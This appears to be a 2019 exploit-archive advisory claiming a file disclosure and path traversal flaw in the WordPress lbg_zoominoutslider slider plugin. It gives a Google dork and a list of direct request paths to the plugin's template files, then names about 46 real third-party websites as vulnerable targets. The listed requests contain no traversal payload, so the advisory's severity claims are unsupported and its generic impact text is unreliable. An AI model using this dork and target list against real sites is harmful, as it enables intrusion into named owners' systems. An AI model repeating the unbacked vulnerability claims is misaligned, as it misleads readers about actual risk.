###########################################################################
# Exploit Title : WordPress lbg_zoominoutslider Plugins 5.0.3 File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com
# Software Download Link :
codecanyon.net/item/responsive-zoom-inout-slider-wordpress-plugin/2950062
codecanyon.net/item/jquery-slider-zoom-inout-effect-fully-responsive/2457203
# Software Information Link :
themesinfo.com/wordpress-plugins/wordpress-lbg_zoominoutslider-plugin-dkf7
# Software Price : 22$
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : 3.8.28 - 3.9.26 - 4.7.12 - 4.3.18 -
4.5.16 - 4.6.13 - 4.8.8 4.9.4 - 4.9.9 - 4.9.x - 5.0.3
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/lbg_zoominoutslider/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]
###########################################################################
# Impact :
********
* WordPress lbg_zoominoutslider plugins 5.0.3 and other versions is prone to an arbitrary file disclosure
vulnerability because it fails to properly sanitize user-supplied input.
* An attacker can exploit this vulnerability to view local files in the context of the web server process,
which may aid in launching further attacks.
* An information exposure is the intentional or unintentional disclosure
of information to an actor that is not explicitly authorized to have access to that information.
* The product stores sensitive information in files or directories that are accessible
to actors outside of the intended control sphere.
* The software uses external input to construct a pathname that is intended to identify a file or
directory that is located underneath a restricted parent directory, but the software does not
properly neutralize special elements within the pathname that can cause the pathname
to resolve to a location that is outside of the restricted directory.
###########################################################################
# Exploit :
***********************
/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php?page=lbg_zoominoutslider_Manage_Sliders
/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php?page=lbg_zoominoutslider_Playlist
/wp-content/plugins/lbg_zoominoutslider/tpl/banners.php
/wp-content/plugins/lbg_zoominoutslider/tpl/help.php
/wp-content/plugins/lbg_zoominoutslider/tpl/overview.php
/wp-content/plugins/lbg_zoominoutslider/tpl/overview.php?page=lbg_zoominoutslider_Manage_Sliders
/wp-content/plugins/lbg_zoominoutslider/tpl/overview.php?page=lbg_zoominoutslider_Add_New
/wp-content/plugins/lbg_zoominoutslider/tpl/overview.php?page=lbg_zoominoutslider_Help
/wp-content/plugins/lbg_zoominoutslider/tpl/playlist.php
/wp-content/plugins/lbg_zoominoutslider/tpl/playlist_elements_over_image.php
/wp-content/plugins/lbg_zoominoutslider/tpl/preview.html
/wp-content/plugins/lbg_zoominoutslider/tpl/settings_form.php
###########################################################################
# Video Tutorials =>
Installation – youtube.com/watch?v=OiuT8zxKmpI
How To Create A Slider – youtube.com/watch?v=xYrOMaUalso
How To Add The Layers – youtube.com/watch?v=nIxHarBvEP4
How To Use It As FullScreen Background For A Single Page/Post- youtube.com/watch?v=7SKWd2fspg8
How To Use It As FullScreen Background For Entire Website- youtube.com/watch?v=PoqrBup7QrM
###########################################################################
# Example Vulnerable Site :
*************************
[+] dorianorchestra.ro/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] stereoptik.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] villamahal.com/wp/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] domainedelajeanne.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] fondationsaintirenee.org/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] filenscene.org/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] heartandhandswine.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] swordstravel.co.uk/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] gobeklitepe.info/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] villa-sanctamaria-motovun.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] falafelhouseflorida.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] callisons.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] alexandercapitallp.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] hdlogistica.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] scottgbrown.co.uk/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] apartamentspa.eu/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] faithofthenations.org/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] timnicholsonracecars.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] lartisan-numerique.com/_PROJ_/EPSETOISE/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php
[+] theflowerpot-macclesfield.co.uk/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] masdespetitsloups.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] anholter-schweiz.de/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] corevc.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] 247snacks.ca/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] delicream.co.il/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] new.zoompanningeffectslider.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] spinesportspt.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] cspro82.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] flatwaterkayaker.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] dalaman.bel.tr/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] denver.haleexpo.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] saar2.shakedeal.co.il/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] salonsbocaraton.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] baronsestateagents.co.uk/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] omar-khayyam.co.uk/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] samplemcdougald.org/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] luxusurlaub-weltweit.de/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] light-pro.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] sebreflex-photographies.fr/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] paysagiste-bouvard-chaillevette.fr/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] henkaconsulting.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] jmconcreting.com.au/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] worthing10k.co.uk/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] pacificappraisers.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] 0800strippers.co.nz/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
[+] naturo.us/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php
###########################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################
